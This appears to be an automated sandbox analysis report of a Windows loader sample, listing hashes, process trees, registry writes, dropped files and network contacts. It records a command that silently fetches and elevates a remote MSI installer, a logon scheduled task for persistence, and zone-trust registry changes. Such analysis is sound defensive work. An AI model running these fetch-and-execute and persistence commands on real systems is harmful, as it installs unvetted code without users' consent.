| File name: | SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717 |
| Full analysis: | https://app.any.run/tasks/2360b354-58a0-4665-a33f-bd8ae9c4d892 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | February 07, 2025, 18:46:56 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 3 sections |
| MD5: | 866819A07DD3AA53AC60E54DD1D1EB08 |
| SHA1: | 219C643039C6AD89CEB5BB6176577CB94CA187F8 |
| SHA256: | C1066265B02FC53F4F6A5CCCC17BFB4896E35530E37871A5E568D1D855BB9D42 |
| SSDEEP: | 24576:VdHHzimeeg2SUbAztkER0426UY730qnY02:VdHHzipeg2SUbAztkER096UY7kqYH |
| .exe | | | Generic Win/DOS Executable (50) |
|---|---|---|
| .exe | | | DOS Executable Generic (49.9) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2020:07:17 10:53:28+00:00 |
| ImageFileCharacteristics: | No relocs, Executable, Large address aware, No debug |
| PEType: | PE32+ |
| LinkerVersion: | 14 |
| CodeSize: | 804352 |
| InitializedDataSize: | 360960 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x127392 |
| OSVersion: | 5.2 |
| ImageVersion: | - |
| SubsystemVersion: | 5.2 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.1.33.2 |
| ProductVersionNumber: | 1.1.33.2 |
| FileFlagsMask: | 0x0017 |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | English (U.S.) |
| CharacterSet: | Unicode |
| FileDescription: | - |
| FileVersion: | 1.1.33.02 |
| InternalName: | - |
| LegalCopyright: | - |
| OriginalFileName: | - |
| ProductName: | - |
| ProductVersion: | 1.1.33.02 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 556 | --pid=3832 | C:\Windows\Temp\rm.exe | — | EPLowPrivilegeWorker.exe | |||||||||||
User: admin Company: OPSWAT, Inc. Integrity Level: HIGH Description: MDES SDK V4 Removal Module Exit code: 0 Version: 2017.08.20.0920 | |||||||||||||||
| 1448 | "C:\Program Files (x86)\communityofficesintakeunverifiedcomputers-5.6.8294\cabarc.exe" -o X "C:\ProgramData\NinjaRMMAgent\download\agent.cab" C:\ProgramData\NinjaRMMAgent\download\upgrade_from_agent5.6.8294\ | C:\Program Files (x86)\communityofficesintakeunverifiedcomputers-5.6.8294\cabarc.exe | — | NinjaRMMAgentPatcher.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Cabinet Tool Exit code: 0 Version: 5.2.3790.0 (srv03_rtm.030324-2048) | |||||||||||||||
| 1668 | cmd.exe /c "taskkill /im ninjarmmagent.exe /f /t" | C:\Windows\SysWOW64\cmd.exe | — | NinjaRMMAgentPatcher.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 128 Version: 10.0.19041.3636 (WinBuild.160101.0800) | |||||||||||||||
| 1796 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | rm.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | |||||||||||||||
| 2124 | "C:\Users\admin\Desktop\EPLowPrivilegeWorker.exe" | C:\Users\admin\Desktop\EPLowPrivilegeWorker.exe | — | explorer.exe | |||||||||||
User: admin Company: Bitdefender Integrity Level: MEDIUM Description: Host for Endpoint Security Exit code: 5002 Version: 7.9.19.475 | |||||||||||||||
| 2160 | C:\rhpsupport\tools\nircmd.exe elevate msiexec /qn /i https://public.rhp-properties.com/corporate/support/packages/communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.msi | C:\RHPSupport\tools\nircmd.exe | — | latest.exe | |||||||||||
User: admin Company: NirSoft Integrity Level: MEDIUM Description: NirCmd Exit code: 0 Version: 2.86 Modules
| |||||||||||||||
| 2408 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cabarc.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | |||||||||||||||
| 2448 | schtasks.exe /create /tn "RHPStartupDownloader" /tr "C:\RHPSupport\Startup-Downloader.exe" /rl HIGHEST /sc ONLOGON /DELAY 0000:30 /F /RU "BuiltIn\Users" | C:\Windows\System32\schtasks.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2448 | netsh wlan add profile filename="C:\RHPSupport\Tools\Wi-Fi-rhpwifi.xml" user=all | C:\Windows\System32\netsh.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Network Command Shell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3260 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Internet Explorer\Privacy |
| Operation: | write | Name: | ClearBrowsingHistoryOnExit |
Value: 0 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData |
| Operation: | write | Name: | UserFilter |
Value: 411F00005308ADBA070000004E01000001000000070000000C000000499A2447F5F1CE010100000012007200680070002D00700072006F0070006500720074006900650073002E0063006F006D000C000000A9E425503D87CF010100000011006D0061006E0061006700650061006D00650072006900630061002E0063006F006D000C000000642A6CD1948CCF01010000000C0063006F006D00650072006900630061002E0063006F006D000C00000064A17DD2948CCF01010000000F0073007400610070006C00650073006C0069006E006B002E0063006F006D000C0000005437C70CBB8CCF01010000000E006400650070006F007300690074006E006F0077002E0063006F006D000C000000686AACC83364D101010000000B0070006100790063006800650078002E0063006F006D000C000000A2D4EF7CB7EDD101010000000B007600650073007400690076006F002E0063006F006D00 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData |
| Operation: | write | Name: | UserFilter |
Value: 411F00005308ADBA070000004E01000001000000070000000C000000499A2447F5F1CE010100000012007200680070002D00700072006F0070006500720074006900650073002E0063006F006D000C000000A9E425503D87CF010100000011006D0061006E0061006700650061006D00650072006900630061002E0063006F006D000C000000642A6CD1948CCF01010000000C0063006F006D00650072006900630061002E0063006F006D000C00000064A17DD2948CCF01010000000F0073007400610070006C00650073006C0069006E006B002E0063006F006D000C0000005437C70CBB8CCF01010000000E006400650070006F007300690074006E006F0077002E0063006F006D000C000000686AACC83364D101010000000B0070006100790063006800650078002E0063006F006D000C000000A2D4EF7CB7EDD101010000000B007600650073007400690076006F002E0063006F006D00 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Control Panel\Desktop |
| Operation: | write | Name: | Wallpaper |
Value: C:\Users\admin\Documents\wide.bmp | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Control Panel\Desktop |
| Operation: | write | Name: | TileWallpaper |
Value: 0 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Control Panel\Desktop |
| Operation: | write | Name: | WallpaperStyle |
Value: 0 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\rhp-properties.com |
| Operation: | write | Name: | * |
Value: 2 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\rhp-properties.com |
| Operation: | write | Name: | * |
Value: 2 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\manageamerica.com |
| Operation: | write | Name: | * |
Value: 2 | |||
| (PID) Process: | (6204) latest.exe | Key: | HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\manageamerica.com |
| Operation: | write | Name: | * |
Value: 2 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6204 | latest.exe | C:\Users\admin\Documents\wide.bmp | — | |
MD5:— | SHA256:— | |||
| 6204 | latest.exe | C:\RHPSupport\tools\BEST_downloaderWrapper.msi | — | |
MD5:— | SHA256:— | |||
| 5200 | msiexec.exe | C:\Windows\Installer\13b22c.msi | — | |
MD5:— | SHA256:— | |||
| 5200 | msiexec.exe | C:\Windows\Installer\MSIB4FB.tmp | — | |
MD5:— | SHA256:— | |||
| 6868 | RHP-Fall-2018-Update.exe | C:\RHPSupport\tools\nircmd.exe | executable | |
MD5:5ED4728CAA339C2A7479102F0C04C087 | SHA256:7160DB2B7A6680480E64F0845512D203A575F807831FAF9A652AAEF0988F876C | |||
| 6204 | latest.exe | C:\Users\admin\Documents\RHP-Fall-2018-Update.exe | executable | |
MD5:B2F1091EFA6F3D222B0FCF9CF4CCB89E | SHA256:0D61EACAEC8E0DF1C245F7720A06278F5429FA86DC6737C2CA72B391C5EB44C9 | |||
| 6868 | RHP-Fall-2018-Update.exe | C:\RHPSupport\tools\nircmd-64.exe | executable | |
MD5:5ED4728CAA339C2A7479102F0C04C087 | SHA256:7160DB2B7A6680480E64F0845512D203A575F807831FAF9A652AAEF0988F876C | |||
| 4320 | SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe | C:\Users\admin\Documents\latest.exe | executable | |
MD5:C1387D5602F2AB49D37EC684FF7C1052 | SHA256:F17D52B63D82F840A3BD24274881D4F4941EEAEC034A12A7A1E185A1418326E0 | |||
| 6868 | RHP-Fall-2018-Update.exe | C:\RHPSupport\Startup-Downloader.exe | executable | |
MD5:866819A07DD3AA53AC60E54DD1D1EB08 | SHA256:C1066265B02FC53F4F6A5CCCC17BFB4896E35530E37871A5E568D1D855BB9D42 | |||
| 6868 | RHP-Fall-2018-Update.exe | C:\RHPSupport\tools\nircmd-32.exe | executable | |
MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC | SHA256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3220 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3220 | svchost.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4320 | SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe | GET | 200 | 12.177.128.130:80 | http://public.rhp-properties.com/corporate/support/packages/latest.exe | unknown | — | — | malicious |
6868 | RHP-Fall-2018-Update.exe | GET | 200 | 12.177.128.130:80 | http://public.rhp-properties.com/corporate/support/packages/Startup-Downloader.exe | unknown | — | — | unknown |
6204 | latest.exe | GET | 200 | 12.177.128.130:80 | http://public.rhp-properties.com/corporate/support/packages/RHP-Fall-2018-Update.exe | unknown | — | — | malicious |
5200 | msiexec.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAQoW7DgyeIab0P7NEpaqGM%3D | unknown | — | — | whitelisted |
5200 | msiexec.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6500 | setupdownloader.exe | GET | 200 | 2.22.242.112:80 | http://download.bitdefender.com/SMB/Hydra/release/bst_win/7.9.19.477/x64/kit.cat?fakeparam=1301287 | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3220 | svchost.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3220 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4320 | SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe | 12.177.128.130:80 | public.rhp-properties.com | ATT-INTERNET4 | US | malicious |
3220 | svchost.exe | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6204 | latest.exe | 12.177.128.130:80 | public.rhp-properties.com | ATT-INTERNET4 | US | malicious |
6868 | RHP-Fall-2018-Update.exe | 12.177.128.130:80 | public.rhp-properties.com | ATT-INTERNET4 | US | malicious |
1176 | svchost.exe | 20.190.159.2:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
public.rhp-properties.com |
| malicious |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
cloud-ecs.gravityzone.bitdefender.com |
| whitelisted |
cloud.gravityzone.bitdefender.com |
| whitelisted |
download.bitdefender.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
4320 | SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe | A Network Trojan was detected | ET USER_AGENTS Suspicious User-Agent (AutoHotkey) |
4320 | SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6204 | latest.exe | A Network Trojan was detected | ET USER_AGENTS Suspicious User-Agent (AutoHotkey) |
6204 | latest.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6868 | RHP-Fall-2018-Update.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6500 | setupdownloader.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6500 | setupdownloader.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6500 | setupdownloader.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6500 | setupdownloader.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
6500 | setupdownloader.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
Process | Message |
|---|---|
Installer.exe | 2025-02-07 18:47:55.468 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] -> AnonID::Init()
|
Installer.exe | 2025-02-07 18:47:55.468 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [truct ServConfig::Product>::Init] Trying standalone IServConfig
|
Installer.exe | 2025-02-07 18:47:55.471 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ ERROR] [ AnonID::Init] failed to get settings plugin as exported plugin
|
Installer.exe | 2025-02-07 18:47:55.471 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] <- AnonID::Init() [0]
|
Installer.exe | 2025-02-07 18:47:58.233 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] <- AnonID::Init() [0]
|
Installer.exe | 2025-02-07 18:47:58.233 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ ERROR] [ AnonID::Init] failed to get settings plugin as exported plugin
|
Installer.exe | 2025-02-07 18:47:58.232 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] -> AnonID::Init()
|
Installer.exe | 2025-02-07 18:47:58.233 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [truct ServConfig::Product>::Init] Trying standalone IServConfig
|
Installer.exe | 2025-02-07 18:48:00.445 000000006313 006884 006800 [ Installer] [LanguageMana] [ TRACE] [ CLanguageManager::Init] -> CLanguageManager::Init()
|
Installer.exe | 2025-02-07 18:48:00.445 000000006313 006884 006800 [ Installer] [LanguageMana] [ TRACE] [ CLanguageManager::Init] Current init count requested: 1
|